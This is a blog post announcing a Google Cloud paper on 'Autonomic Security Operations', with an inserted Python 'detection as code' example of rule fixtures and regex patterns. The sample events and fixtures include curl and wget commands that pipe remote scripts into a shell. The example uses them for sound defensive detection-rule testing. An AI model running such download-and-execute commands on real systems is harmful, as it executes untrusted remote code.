New Paper: “Autonomic Security Operations — 10X Transformation of the Security Operations Center”

By Anton Chuvakin, Head of Solutions Strategy at Google Cloud

It is with much excitement that we release a new paper about transforming your security operations, published under the Office of the CISO at Google Cloud.

This work is focused on our vision and lessons learned in building effective security operations for the future. We spent a lot of time thinking about what to call the new model. We decided on “Autonomic Security Operations” for the vision (the previous contender was “10X SOC”).

Now, when we say “autonomic” here, we do not mean “without people” or “fully automated.” All of us here agree that that is quite impossible. When we think of autonomic security operations, we think of an approach that leverages automation, but also focuses on being agile, adaptive to rapidly changing environments, and one that uses people with dramatically increased effectiveness.

While I want you to read our paper, let’s now think about two interesting and useful ideas from it.

One question that I’ve been trying to explore, including in this podcast, is this: we know that DevOps and SRE approaches revolutionized how IT is managed and practiced. What could be a similar revolution in security and, more specifically, in security operations?

The answers, of course, are obvious. What is the “O” in SOC? Operations. What happens to operations in the DevOps model? It becomes fused with development, thus toil decreases, while automation increases. Less toil, but more code.

Naturally, we see the same thing slowly starting to happen in good SOCs or detection teams (if you insist on being “SOCless”). In the SOC context, this is about detection engineering, detection as code and related concepts.
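To make “detection as code” concrete, here is an added example (not from the paper and not Google’s tooling): detection rules defined as data with a predicate, each carrying its own positive and negative fixtures, so the same test that a DevOps pipeline would run on application code runs on the detections before they reach production. The events, rule IDs and field names are constructed for illustration.

```python
"""Detection-as-code sketch (added example): rules are versioned data with
tests, not ad-hoc console searches. All events and rule IDs are constructed."""
import re
from dataclasses import dataclass, field
from typing import Callable, Dict, Iterable, List, Tuple

# Constructed sample process events; not real telemetry.
SAMPLE_EVENTS: List[Dict] = [
    {"ts": 1, "host": "web-1", "user": "svc-web", "proc": "bash", "parent": "httpd",
     "cmd": "curl -s http://10.0.0.5/payload | sh"},
    {"ts": 2, "host": "web-1", "user": "alice", "proc": "bash", "parent": "sshd",
     "cmd": "ls -la"},
    {"ts": 3, "host": "db-1", "user": "root", "proc": "bash", "parent": "cron",
     "cmd": "wget http://example.org/a.sh -O- | bash"},
    {"ts": 4, "host": "web-2", "user": "bob", "proc": "curl", "parent": "bash",
     "cmd": "curl https://api.internal/health"},
]


@dataclass(frozen=True)
class Rule:
    """A detection is code: an ID, a predicate, and the fixtures that prove it."""
    id: str
    title: str
    severity: str
    predicate: Callable[[Dict], bool]
    # Fixtures travel with the rule so CI can validate it on every change.
    should_match: Tuple[Dict, ...] = field(default_factory=tuple)
    should_not_match: Tuple[Dict, ...] = field(default_factory=tuple)


_FETCH = re.compile(r"\b(?:curl|wget)\b")
_PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba)?sh\b")


def downloads_and_pipes_to_shell(e: Dict) -> bool:
    """Fetch tool whose output is piped straight into a shell."""
    cmd = e.get("cmd", "")
    return bool(_FETCH.search(cmd) and _PIPE_TO_SHELL.search(cmd))


def webserver_spawns_shell(e: Dict) -> bool:
    """A web server process becoming the parent of a shell."""
    return e.get("parent") in {"httpd", "nginx", "apache2"} and \
        e.get("proc") in {"bash", "sh", "dash"}


RULES: List[Rule] = [
    Rule(id="R-001", title="Remote script piped to shell", severity="high",
         predicate=downloads_and_pipes_to_shell,
         should_match=({"cmd": "curl -s http://x/p | sh"},),
         should_not_match=({"cmd": "curl https://api.internal/health"},)),
    Rule(id="R-002", title="Web server process spawned a shell", severity="medium",
         predicate=webserver_spawns_shell,
         should_match=({"parent": "httpd", "proc": "bash"},),
         should_not_match=({"parent": "sshd", "proc": "bash"},)),
]


def run_detections(events: Iterable[Dict], rules: List[Rule] = RULES) -> List[Dict]:
    """Evaluate every rule against every event and return alert records."""
    alerts = []
    for e in events:
        for r in rules:
            if r.predicate(e):
                alerts.append({"rule": r.id, "severity": r.severity,
                               "host": e.get("host"), "ts": e.get("ts")})
    return alerts


def validate_rules(rules: List[Rule] = RULES) -> List[str]:
    """Unit-test each rule against its fixtures; return a list of failures.
    Run in CI so a broken or over-broad rule never ships."""
    failures = []
    for r in rules:
        for ev in r.should_match:
            if not r.predicate(ev):
                failures.append(f"{r.id}: expected match on {ev}")
        for ev in r.should_not_match:
            if r.predicate(ev):
                failures.append(f"{r.id}: unexpected match on {ev}")
    return failures


if __name__ == "__main__":
    problems = validate_rules()
    assert not problems, problems
    for alert in run_detections(SAMPLE_EVENTS):
        print(alert)
```

The point is less the two toy rules than the workflow they sit in: a rule change is a commit, the fixtures are the regression suite, and a failing `validate_rules()` blocks the merge. That is the SOC equivalent of the “less toil, more code” shift the post describes.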

Just as naturally, and just as it happened in IT first, many people don’t like these changes. For example, the comments on this blog post indicate security teams don’t want anything “as code” because this means they have to code. But, it’s likely that Windows NT system administrators of the 1990s also did not want to become part of DevOps…

Next, what about the other part of the SOC, namely the “C”? Will SOC remain at the center of anything? Will it always be a crowded room with fancy monitors?

As we watched current events affect security operations, we learned that SOC as a big room, full of people, may in fact disappear. However, I’ve long argued that SOC is first a team that focuses on detecting threats and helping respond to them and so it will not vanish anytime soon. What if the future SOC would be a center in the same sense as “a center of excellence”, but not a central physical location anymore?

So, what happens if a SOC both becomes infused with DevOps approaches and stops being a centralized silo?

As you will see in our new paper on autonomic security operations, we are presenting this very vision of future security operations. Using the lessons from DevOps and SRE approaches, we propose that a security operations center would become less about operations and less of a center.

These changes are critical, if not to say truly necessary, to deal with the business, IT landscape and threats of the future. Below, and of course in the paper, you will see many examples of how we describe such a transformed SOC and how you can take steps towards making your security operations center work that way.

So, please see a tiny subset of my favorite quotes from our paper:

  • “Autonomic Security Operations is a combination of philosophies, practices, and tools that improve an organization’s ability to withstand security attacks through an adaptive, agile, and highly automated approach to threat management.”
  • “An unfortunate common theme of many cloud transformations is that the SOC requirements get deprioritized when organizations have tight timelines and budgets to drive their teams to the cloud. The reason being, most SOC teams are too busy fighting fires and don’t have the spare cycles to focus on adapting their use cases to cloud workloads and modernizing their own infrastructure.”
  • “To be 10 times more effective with the people component, your SOC cannot achieve this by increasing the personnel by a factor of 10. As of today, both threats and technology resources that need effective security are increasing at a much faster pace than people entering the workforce. […] It is absolutely impossible for most organizations to 10x their headcount in a SOC.”
  • “At Google and across other industry-leading security operations teams, the role of an analyst is not simply to manage cases and perform tier-1 level work. Analysts are engineers, architects, project managers, and are empowered to be leaders of their subject matter focus. At such a SOC, the concept of Level 1 to Level 3 analysts is a thing of the past, rather, you should organize teams based on aligning skills to the use cases that fall under their purview.”
  • “The SOC can only truly be 10X and transformative if it also has strong influence over the upstream elements of the security lifecycle. You can make a significant impact on the amount of alerts that get into your SOC if your team has a strong integration with your DevOps practice. A deep understanding of how infrastructure and applications are securely built, deployed, and managed across your organization paired with your ability to influence this design can only improve your ability to catch attackers at their earliest onset, or even better, prevent them from getting in entirely.”

But really, check out the paper here. You can also read about the related solution launch involving Chronicle, and watch a demo of Autonomic Security Operations here.